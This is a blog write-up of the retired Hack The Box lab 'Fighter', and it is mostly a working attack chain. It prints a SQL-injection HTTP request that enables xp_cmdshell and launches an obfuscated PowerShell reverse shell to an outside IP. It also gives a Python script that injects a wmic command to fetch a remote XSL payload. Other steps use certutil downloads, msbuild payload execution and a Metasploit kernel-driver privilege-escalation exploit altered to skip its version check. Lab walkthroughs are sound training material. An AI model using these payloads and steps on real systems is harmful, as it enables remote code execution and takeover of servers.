htb-fighter-nl

Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the webpage and find that the web application is vulnerable to SQL injection.  We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by npc payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.

sc query capcom

We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check the uid we find that we are successfully able to get administrative rights.

We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “FmfEhO1}h”.

So we create a c program that XOR’s 9 with each character of “FmfEhO1}h”.

We compile and run the file and get the password to be “OdioLaFeta”.

When we provide the password to the root.exe we get our final flag.

With help of Empire

bypass the defender starfighter_xsl from empire by Luis Vacas
For this we are going to develop a small python script that makes us run our .xsl and get empire agent :

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
from requests import *

params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
.
.

Let’s migrate the empire to metasploit:https://github.com/trustedsec/nps_payload (example of use)

1
2
3
cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author:Puckiestyle

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *